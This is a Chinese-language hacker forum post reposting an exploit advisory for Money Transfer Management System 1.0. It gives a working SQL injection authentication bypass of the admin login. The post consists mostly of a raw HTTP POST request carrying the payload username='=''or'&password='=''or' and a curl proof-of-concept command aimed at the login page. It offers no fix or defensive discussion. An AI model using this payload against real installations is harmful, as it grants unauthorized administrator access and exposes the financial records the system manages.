跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Money Transfer Management System 1.0 - Authentication Bypass

精选回复

发布于
# Exploit Title: Money Transfer Management System 1.0 - Authentication Bypass
# Date: 2021-11-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10
# Admin panel authentication bypass

Admin panel authentication can be bypassed due to a SQL injection in the login form:

Request:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/mtms/admin/login.php
Content-Length: 37
Cookie: PHPSESSID=8jff4m81f5j0ej125k1j9rdrc3
Connection: keep-alive

username='=''or'&password='=''or'

PoC:
curl -d "username='=''or'&password='=''or'" -X POST http://localhost/mtms/admin/login.php
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。